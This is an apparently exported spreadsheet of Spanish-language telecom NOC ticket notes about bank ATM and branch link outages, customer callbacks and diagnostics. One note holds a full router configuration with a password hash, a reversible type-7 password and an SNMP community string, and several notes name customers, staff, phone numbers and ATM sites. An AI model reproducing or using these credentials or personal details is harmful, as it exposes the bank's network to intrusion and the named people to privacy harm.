NOTA: ACTUALMENTE EL CAJERO SE ENCUENTRA OPERANDO VÍA ENLACE REDUNDANTE 3G POR LO QUE NOTARAN ELEVADOS TIEMPOS DE RESPUESTA.
INTERFAZ SE OBESERVA DOWN
SNMP OPERSTATUS:
INTERFACE            OPERSTATUS
ETHERNET0/0          UP
ETHERNET0/1          DOWN &lt;&lt;&lt;&lt;&lt;------------------------INTERFACE PRINCIPAL DEL ROUTER TELDAT HACIA CTC UNION CAÍDO.
CELLULAR1/0          UP
CELLULAR1/1          UP
CELLULAR1/2          UP
DIRECT-IP10          UP
TNIP10               UP
TNIP20               UP
LOOPBACK5            UP
TICKET: F4624607
ID: 47504206T
UBICACION: CAJERO_5058_BOULEVARD SACOJ GRANDE 72-79 ZONA 6 DE MIXCO_FARMACIA GALENO NO. 315 SACOJ GRANDE
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4624613</t>
  </si>
  <si>
    <t>SE LLAMO AL NUMERO DEL GDN Y LA LLAMADA COMPLETA.
SE SOLICITA HABLAR CON EL CLIENTE MANUEL MARTINEZ, DEJAN EN ESPERA.
3001409590
COLA:
NOMBRE: A: 0050324833700
NÚMERO: 0050324833700
DURACIÓN: 0:00:17
ESTADO: CONECTADA
DETALLES: 0050324833700
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 1/07/2022 16:21:44</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE  MANUEL MARTINEZ  QUIEN PROCEDE A REALIZAR PRUEBAS. SOLICITA SE LE MARQUE A LAS 11:30
3001709563
COLA:
NOMBRE: A: 0050378509728
NÚMERO: 0050378509728
DURACIÓN: 0:00:00
ESTADO: MARCANDO
DETALLES: 0050378509728
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 4/07/2022 11:04:45</t>
  </si>
  <si>
    <t>SE HABLA CON MANUEL MARTINEZ AL 24833700, INDICA QUE TIENEN PROBLEMAS CON SUS LLAMADAS ENTRANTES QUE SE CORTAN Y CUANDO COMPLETAN TIENEN RUIDO., SOLICITA QUE SE CERTIFIQUE EL E1, CLIENTE SOLICITA QUE LA VISITA SEA EL DÍA LUNES A LAS 8 AM, NO ES NECESARIO TRAMITAR PERMISOS, ÚNICAMENTE QUE SE IDENTIFIQUEN CON PERSONAL DE SEGURIDAD. ID: 3001451981</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE MANUEL MARTINEZ, QUIEN INDICA QUE LAS LLAMADAS A SU EXTENSION Y A LAS EXTENSIONES DE FINANZAS SE ESTAN CORTANDO. SE LE CONSULTO SI CON EL GDN PASA LO MISMO. EL CLIENTE INDICO QUE NO.
INDICA QUE AHORITA YA NO ESTA LABORANDO Y SOLICITA QUE SE LE LLAME MAÑANA A SU EXTENSION 24833708. PARA REALIZAR PRUEBAS.</t>
  </si>
  <si>
    <t>F4624616</t>
  </si>
  <si>
    <t xml:space="preserve">**SE LLAMA A CLIENTE AL 22437253 CONTESTA EL SEÑOR JEFERSON ARCE INIDCA QUE SE HA VISTO CON ALGUNAS PERDIDAS SOLICITA SE VERIFIQUE || SE NOTIFICA A GESTOR  **
-ID 3001672372
**	</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 22437253 NO RESPONDE OPERADORA INDICA QUE TODOS LOS AGENTES ESTAN OCUPADOS || SE INTENTARA LUEGO **
-ID 3001666771
**</t>
  </si>
  <si>
    <t>F4624667</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 1 DE JULIO DE 2022 17:28PARA: SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;; MONITOREOFALLASATM@5B.COM.GT &lt;MONITOREOFALLASATM@5B.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE PRINCIPAL ALARMADO PARA CLIENTE "CC_TYT_GT_ATM194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4667
ID: 47501632T
IDENTIFICADOR DEL CLIENTE: CC_TYT_GT_ATM1946
UBICADO EN:  CAJERO 1946 CIUDAD CAYALA SOTANO F 22 C. 9-33 ZONA 16
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>|| SE LE ENVIA CORREO A CLIENTE SOLICITANDO LA VISITA PARA MIERCOLES 10 HRS, SEGUN INDICA SUPERVISOR EL ADMINISTRACION DEL CC NO LABORA MAÑANA, Y EN LO QUE GESTIONAN LOS ACCESOS LOS DE 5B|| PENDIENTE QUE CONFIRMEN
ASUNTO: RE: ENVÍO DE SUPERVISOR ATM 1946
ERITO FERNANDO TECU XITUMUL
BUEN DÍA ESTIMADOS 5B.
EN SEGUIMIENTO AL SERVICIO REPORTADO ATM1946 || UBICACIÓN: CAJERO 1946 CIUDAD CAYALA SOTANO F 22 C. 9-33 ZONA 16.
SOLICITAMOS NOS PUEDAN APOYAR EN GESTIONAR LA VISITA EN CONJUNTO Y VERIFICAR ACCESOS CON ADMINISTRACIÓN DEL CENTRO COMERCIAL PARA EL DÍA MIÉRCOLES 06/07A LAS 10:00 HRS, SEGÚN SE TIENE CONOCIMIENTO EL PERSONAL DE ADMINISTRACIÓN DEL CC NO LABORA EL DÍA DE MAÑANA.
ADJUNTO LOS DATOS DEL POSIBLE PERSONAL TÉCNICO ASIGNADO.</t>
  </si>
  <si>
    <t>SE LLAMA A 5B CONTESTA DANIEL ENVIARAN A SUPERVISOR A VERIFICAR EQUIPOS EN PUNTO REMOTO.
RESULTADO: LLAMADA HECHA
NOMBRE: 24207212
NÚMERO: 24207212
INICIO: HOY, 18:27
FIN: HOY, 18:34
DURACIÓN: 6:09
ID DE LLAMADA: 3001432476</t>
  </si>
  <si>
    <t>F4624688</t>
  </si>
  <si>
    <t>SE HABLO CON EL CLIENTE DAVID QUIEN INDICO QUE YA NO HAY PERSONAL EN LA OFICINA Y SOLICITA QUE SE LE LLAME MAÑANA A LAS 8:00AM PARA REVISAR EQUIPOS.
3001424762
COLA:
NOMBRE: A: 56081774
NÚMERO: 56081774
DURACIÓN: 0:00:46
ESTADO: CONECTADA
DETALLES: 56081774
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 1/07/2022 17:32:14</t>
  </si>
  <si>
    <t>CLIENTE IRLANDA FRANCO 2444-5858 REALIZA PRUEBAS Y VALIDA QUE YA TIENE LLAMADAS ENTRANTES Y SALIENTES. AUTORIZA EL CIERRE DEL CASO.
3001456585
COLA:
NOMBRE: A: 24445858
NÚMERO: 24445858
DURACIÓN: 0:01:02
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 24445858
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: SAQITZUNUN.COJTI
FECHA Y HORA LOCALES: 02/07/2022 08:25:30 A. M.</t>
  </si>
  <si>
    <t>F4624698</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE, VALIDANDO EL SERVICIO, A LA ESPERA DE RESPUESTA.
ELVYN ARIEL LOPEZ RECINOS
BUEN DÍA ESTIMADO CLIENTE;
SE HA REVISADO LAS SALIDAS INTERNACIONALES NO TENEMOS  EVENTOS RECIENTES QUE AFECTEN AL SERVICIO, ACTUALMENTE A NIVEL DE LA RED DE CLARO SE ENCUENTRA OPERATIVO Y ESTABLE, NOS PUEDEN INDICAR SI AUN PERSISTE LA AFECTACIÓN:
EVIDENCIA:</t>
  </si>
  <si>
    <t>F4624708</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE RICARDO MOLINA QUIEN INDICA QUE INTENTA SACAR UNA LLAMADA YA SEA A FIJO A CELULAR Y HASTA LA 5TA VEZ LO PERMITE.
3001433902
COLA:
NOMBRE: A: 0050377544742
NÚMERO: 0050377544742
DURACIÓN: 0:00:10
ESTADO: MARCANDO
DETALLES: 0050377544742
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 1/07/2022 18:40:31</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE RICARDO MOLINA Y ENVIA A BUZON. SE LLAMARA ENSEGUIDA.
3001632590
COLA:
NOMBRE: A: 0050377544742
NÚMERO: 0050377544742
DURACIÓN: 0:00:05
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050377544742
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 3/07/2022 14:46:17</t>
  </si>
  <si>
    <t>CLIENTE  RICARDO MOLINA 77544742   SOLICITA SE VALIDE A LAS 17 HORAS. LLAMADA DESDE VI-VO</t>
  </si>
  <si>
    <t>SE REALIZARON PRUEBAS CON EL CLIENTE RICARDO MOLINA
25113800 HACIA EL 79769216 FECHA 1/07/22 HORA 19:25 TONO DE OCUPADO
25113800 HACIA EL 22902528 FECHA 1/07/22 HORA 19:26 TONO DE OCUPADO
3001438435
COLA:
NOMBRE: A: 0050377544742
NÚMERO: 0050377544742
DURACIÓN: 0:03:15
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050377544742
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 1/07/2022 19:27:24</t>
  </si>
  <si>
    <t>F4624735</t>
  </si>
  <si>
    <t>SE LLAMA AL 22491330 Y LA LLAMADA COMPLETA, ATIENDE CLIENTE ABEL CABRERA QUIEN VALIDA QUE YA TIENE LLAMADAS ENTRANTES E INDICA QUE YA REALIZÓ PRUEBAS Y TAMBIÉN TIENE LLAMADAS SALIENTES. AUTORIZA EL CIERRE DEL CASO. ID DE LLAMADA: 3001467367</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE ABEL CABRERA 70821159, SE LE INDICA QUE AL LLAMAR AL GDN RESPONDE EL IVR PERO NADIE CONTESTA, CLIENTE INDICA QUE SE PRUEBE LLAMANDO AL 22491330. ID:3001466406</t>
  </si>
  <si>
    <t>F4624748</t>
  </si>
  <si>
    <t>SE LLAMÓ A CLIENTE 22437253 PARA CONSULTAR COMPORTAMIENTO DEL SERVICIO, NO CONTESTA; A NIVEL DE CLARO ENLACE OK; SE DEBE INTENTAR MÁS TARDE.</t>
  </si>
  <si>
    <t>F4624750</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LUIS GIRON AL 56977372 CLIENTE CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 3001666661
**</t>
  </si>
  <si>
    <t>F4624815</t>
  </si>
  <si>
    <t xml:space="preserve">ENLACE OPERATIVO SE PROCEDE CON CIERRE POR ALARMA DE ENRGIA COMERCIAL HACE 7MINUTOS
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
SE OBSERVA UNA ALARMA DE ENERGIA RECIENTE (HACE: 7 MINUTOS)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BANRURAL_GT_INTERNET_AGENCIA_705 UPTIME IS 7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600YS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BANRURAL_GT_INTERNET_AGENCIA_705#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 3751 BYTES
!
VERSION 15.6
NO SERVICE PAD
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_BANRURAL_GT_INTERNET_AGENCIA_705
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 5 $1$9NTV$UKHYOUGDWCJICMPNTXMPK/
!
NO AAA NEW-MODEL
WAN MODE ETHERNET
CLOCK TIMEZONE GUA -6 0
!
!
!
!
IP DHCP POOL BANRURAL
 NETWORK 192.168.1.0 255.255.255.0
 DEFAULT-ROUTER 192.168.1.1
 DNS-SERVER 8.8.8.8 8.8.4.4
!
!
!
IP CEF
NO IPV6 CEF
!
!
!
!
!
!
!
!
!
!
!
!
!
USERNAME GESTIONIP PASSWORD 7 10402C4E1247000048
!
!
CONTROLLER VDSL 0
 SHUTDOWN
!
!
!
!
!
!
!
!
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.176.34 255.255.255.255
!
INTERFACE ATM0
 DESCRIPTION INTERFACE NO SE ENCUENTRA EN USO
 NO IP ADDRESS
 SHUTDOWN
 NO ATM ILMI-KEEPALIVE
!
INTERFACE ETHERNET0
 DESCRIPTION INTERFACE NO SE ENCUENTRA EN USO
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE FASTETHERNET0
 DESCRIPTION INTERFACE NO SE ENCUENTRA EN USO
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE FASTETHERNET1
 DESCRIPTION INTERFACE NO SE ENCUENTRA EN USO
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE FASTETHERNET2
 DESCRIPTION INTERFACE NO SE ENCUENTRA EN USO
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0
 DESCRIPTION INTERFACE NO SE ENCUENTRA EN USO
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET1
 DESCRIPTION LAN DEL CLIENTE
 NO IP ADDRESS
!
INTERFACE GIGABITETHERNET2
 DESCRIPTION WAN PRINCIPAL/_/832000056T/_/
 BANDWIDTH 5120
 IP ADDRESS 10.78.46.2 255.255.255.224
 IP NAT OUTSIDE
 IP VIRTUAL-REASSEMBLY IN
 LOAD-INTERVAL 30
 DUPLEX AUTO
 SPEED AUTO
 NO CDP ENABLE
!
INTERFACE VLAN1
 DESCRIPTION LAN DEL CLIENTE
 IP ADDRESS 192.168.1.1 255.255.255.0 SECONDARY
 IP ADDRESS 181.209.219.221 255.255.255.252
 IP NAT INSIDE
 IP VIRTUAL-REASSEMBLY IN
 RATE-LIMIT INPUT 5120000 960000 1920000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
 RATE-LIMIT OUTPUT 5120000 960000 1920000 CONFORM-ACTION TRANSMIT EXCEED-ACTION DROP
!
IP FORWARD-PROTOCOL ND
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
!
IP NAT POOL BANRURAL 181.209.219.221 181.209.219.221 PREFIX-LENGTH 30
IP NAT INSIDE SOURCE LIST 10 INTERFACE VLAN1 OVERLOAD
IP ROUTE 0.0.0.0 0.0.0.0 10.78.46.1
IP SSH SERVER ALGORITHM ENCRYPTION AES128-CTR AES192-CTR AES256-CTR
IP SSH CLIENT ALGORITHM ENCRYPTION AES128-CTR AES192-CTR AES256-CTR
!
LOGGING SOURCE-INTERFACE LOOPBACK5
!
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION INTERNET_MIXCO SAN CRISTOBAL 5 AVENIDA 3-05 SECTOR A-3 SAN CRISTOBAL 1 ZONA 8 MIXCO
ACCESS-LIST 10 PERMIT 192.168.1.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NO MODEM ENABLE
LINE AUX 0
LINE 2
 NO ACTIVATION-CHARACTER
 NO EXEC
 TRANSPORT PREFERRED NONE
 TRANSPORT INPUT ALL
 STOPBITS 1
LINE VTY 0 4
 ACCESS-CLASS ACCESO IN
 LOGIN LOCAL
 TRANSPORT INPUT ALL
!
SCHEDULER ALLOCATE 60000 1000
!
END
CC_BANRURAL_GT_INTERNET_AGENCIA_705#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 40 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 40 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (8192 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
    TRAP LOGGING: LEVEL INFORMATIONAL, 41 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
        LOOPBACK5
LOG BUFFER (8192 BYTES):
*JUL  2 03:11:55.211: PIM: BFD INITIALIZATION FAILED
*JUL  2 03:11:57.919: %VPN_HW-6-INFO_LOC: CRYPTO ENGINE: ONBOARD 0  STATE CHANGED TO: INITIALIZED
*JUL  2 03:11:57.923: %VPN_HW-6-INFO_LOC: CRYPTO ENGINE: ONBOARD 0  STATE CHANGED TO: ENABLED
*JUL  2 03:12:08.647: %LINK-3-UPDOWN: INTERFACE ETHERNET0, CHANGED STATE TO DOWN
*JUL  2 03:12:08.647: %LINK-3-UPDOWN: INTERFACE ATM0, CHANGED STATE TO DOWN
*JUL  2 03:12:08.647: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VOIP-NULL0, CHANGED STATE TO UP
*JUL  2 03:12:08.651: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET2, CHANGED STATE TO DOWN
*JUL  2 03:12:08.651: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE ONBOARD VPN, CHANGED STATE TO UP
*JUL  2 03:12:09.163: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO DOWN
*JUL  2 03:12:10.299: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE ETHERNET0, CHANGED STATE TO DOWN
*JUL  2 03:12:10.299: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE ATM0, CHANGED STATE TO DOWN
*JUL  2 03:12:10.299: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET2, CHANGED STATE TO DOWN
*JUL  1 21:12:14.487 GUA: %SYS-6-CLOCKUPDATE: SYSTEM CLOCK HAS BEEN UPDATED FROM 03:12:14 UTC SAT JUL 2 2022 TO 21:12:14 GUA FRI JUL 1 2022, CONFIGURED FROM CONSOLE BY VTY0.
*JUL  1 21:12:15.563 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE LOOPBACK5, CHANGED STATE TO UP
*JUL  1 21:12:15.731 GUA: %SYS-5-CONFIG_I: CONFIGURED FROM MEMORY BY CONSOLE
*JUL  1 21:12:16.131 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE NVI0, CHANGED STATE TO UP
*JUL  1 21:12:16.131 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET2, CHANGED STATE TO UP
*JUL  1 21:12:16.587 GUA: %LINK-5-CHANGED: INTERFACE ATM0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*JUL  1 21:12:16.691 GUA: %LINK-5-CHANGED: INTERFACE ETHERNET0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*JUL  1 21:12:16.691 GUA: %LINK-5-CHANGED: INTERFACE FASTETHERNET0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*JUL  1 21:12:16.691 GUA: %LINK-5-CHANGED: INTERFACE FASTETHERNET1, CHANGED STATE TO ADMINISTRATIVELY DOWN
*JUL  1 21:12:16.691 GUA: %LINK-5-CHANGED: INTERFACE FASTETHERNET2, CHANGED STATE TO ADMINISTRATIVELY DOWN
*JUL  1 21:12:16.691 GUA: %LINK-5-CHANGED: INTERFACE GIGABITETHERNET0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*JUL  1 21:12:16.927 GUA: %SYS-5-RESTART: SYSTEM RESTARTED --
CISCO IOS SOFTWARE, C860 SOFTWARE (C860VAE2-ADVSECK9-M), VERSION 15.6(3)M3A, RELEASE SOFTWARE (FC2)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2017 BY CISCO SYSTEMS, INC.
COMPILED TUE 19-SEP-17 00:39 BY PROD_REL_TEAM
*JUL  1 21:12:16.931 GUA: %SNMP-5-COLDSTART: SNMP AGENT ON HOST CC_BANRURAL_GT_INTERNET_AGENCIA_705 IS UNDERGOING A COLD START
*JUL  1 21:12:16.975 GUA: %CRYPTO-6-ISAKMP_ON_OFF: ISAKMP IS OFF
*JUL  1 21:12:17.143 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET2, CHANGED STATE TO UP
*JUL  1 21:12:17.695 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET0, CHANGED STATE TO DOWN
*JUL  1 21:12:17.695 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET1, CHANGED STATE TO DOWN
*JUL  1 21:12:17.695 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET2, CHANGED STATE TO DOWN
*JUL  1 21:12:17.695 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET0, CHANGED STATE TO DOWN
*JUL  1 21:12:17.743 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET1, CHANGED STATE TO DOWN
*JUL  1 21:12:18.743 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE GIGABITETHERNET1, CHANGED STATE TO UP
*JUL  1 21:12:18.743 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE WLAN-GIGABITETHERNET0, CHANGED STATE TO UP
*JUL  1 21:12:20.579 GUA: %LINK-3-UPDOWN: INTERFACE GIGABITETHERNET1, CHANGED STATE TO UP
*JUL  1 21:12:31.943 GUA: %BOOT SECOND FIRMWARE WITH EMBEDDED BINARY.
*JUL  1 21:12:32.103 GUA: %BOOT SECOND CORE FIRMWARE
*JUL  1 21:12:44.351 GUA: %CONTROLLER-5-UPDOWN: CONTROLLER VDSL 0, CHANGED STATE TO ADMINISTRATIVELY DOWN
*JUL  1 21:12:47.103 GUA: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE VLAN1, CHANGED STATE TO UP
*JUL  1 21:13:08.355 GUA: %SYS-6-STACKLOW: STACK FOR LEVEL GENERAL INTERRUPT RUNNING LOW, 0/9000
CC_BANRURAL_GT_INTERNET_AGENCIA_705#
SHOW CLOCK
*21:17:59.079 GUA FRI JUL 1 2022
CC_BANRURAL_GT_INTERNET_AGENCIA_705#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.78.46.1              1   B443.2673.137E  ARPA   GIGABITETHERNET2
INTERNET  10.78.46.2              -   4C71.0C9D.5C45  ARPA   GIGABITETHERNET2
INTERNET  181.209.219.221         -   4C71.0C9D.5C40  ARPA   VLAN1
INTERNET  181.209.219.222         0   683A.1E7C.694D  ARPA   VLAN1
INTERNET  192.168.1.1             -   4C71.0C9D.5C40  ARPA   VLAN1
CC_BANRURAL_GT_INTERNET_AGENCIA_705#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
AT0                            ADMIN DOWN     DOWN     INTERFACE NO SE ENCUENTRA EN USO
ET0                            ADMIN DOWN     DOWN     INTERFACE NO SE ENCUENTRA EN USO
FA0                            ADMIN DOWN     DOWN     INTERFACE NO SE ENCUENTRA EN USO
FA1                            ADMIN DOWN     DOWN     INTERFACE NO SE ENCUENTRA EN USO
FA2                            ADMIN DOWN     DOWN     INTERFACE NO SE ENCUENTRA EN USO
GI0                            ADMIN DOWN     DOWN     INTERFACE NO SE ENCUENTRA EN USO
GI1                            UP             UP       LAN DEL CLIENTE
GI2                            UP             UP       WAN PRINCIPAL/_/832000056T/_/
LO5                            UP             UP       MONITOREO DEL CNOC
NV0                            UP             UP
VL1                            UP             UP       LAN DEL CLIENTE
CC_BANRURAL_GT_INTERNET_AGENCIA_705#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ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET1           UNASSIGNED      YES UNSET  UP                    UP
GIGABITETHERNET2           10.78.46.2      YES NVRAM  UP                    UP
LOOPBACK5                  10.212.176.34   YES NVRAM  UP                    UP
NVI0                       10.78.46.2      YES UNSET  UP                    UP
VLAN1                      181.209.219.221 YES NVRAM  UP                    UP
CC_BANRURAL_GT_INTERNET_AGENCIA_705#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN INTERNET_GT_METRO 10.78.46.2
  PING 10.78.46.2: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.78.46.2 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/25 MS
RUTA IP:
PE: 10.179.28.10
DISPLAY IP ROUTING-TABLE VPN-INSTANCE INTERNET_GT_METRO 10.78.46.2
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : INTERNET_GT_METRO
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
     10.78.46.2/32  DIRECT  0    0                 0.0.0.0         VLANIF3740			</t>
  </si>
  <si>
    <t>F4624823</t>
  </si>
  <si>
    <t>Y SE ENCONTRÓ UNA ALARMA DE ENERGÍA HACE 2 HORAS 22 MINUTOS SE PROCEDERÁ CON VALIDAR  PERO SE TUVO UNA RECONVERGENCIA EN PANAMÁ LO CUAL ES POSIBLE QUE ALLÁ PROVOCADO LA INESTABILIDAD ACTUALMENTE SE OBSERVA OPERATIVO SIN PÉRDIDAS NI TIEMPOS ALTOS</t>
  </si>
  <si>
    <t>F4624867</t>
  </si>
  <si>
    <t xml:space="preserve">ESTIMADO CLIENTE EL ENLACE ESTA SIENDO AFECTADO POR  INTERVENCION EN ELGIN RIR 5497095 PORFAVOR SI SOLICITA AVANCES EL CLIENTE AL CULMINA LA VENTANA SE VE OPERTIVO VALIDAR CON CLIENTE.
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN DHL_TELMEX 187.128.59.118
  PING 187.128.59.118: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 187.128.59.118 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
RUTA IP:
PE: 10.179.28.19
DISPLAY IP ROUTING-TABLE VPN-INSTANCE DHL_TELMEX 187.128.59.118
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : DHL_TELMEX
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
 187.128.59.116/30  DIRECT  0    0             D   187.128.59.117  50|100GE8/1/0.436			
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN DHL_TELMEX 187.128.59.118
  PING 187.128.59.118: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 187.128.59.118 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
RUTA IP:
PE: 10.179.28.19
DISPLAY IP ROUTING-TABLE VPN-INSTANCE DHL_TELMEX 187.128.59.118
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : DHL_TELMEX
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
 187.128.59.116/30  DIRECT  0    0             D   187.128.59.117  50|100GE8/1/0.436			</t>
  </si>
  <si>
    <t>F4624949</t>
  </si>
  <si>
    <t xml:space="preserve">SE PROCEDE A DEJAR EN ETAPA PENDIENTE CLIENTE POR INTERVENCION A LA RED  RIR DE ELGIN 5497095
NO SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE CAÍDO.
PING HACIA ROUTER CPE:
PING -M 10 -Q -VPN INTERNET_GT_METRO 10.31.145.10
  PING 10.31.145.10: 56  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.31.145.10 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
RUTA IP:
PE: 10.179.28.19
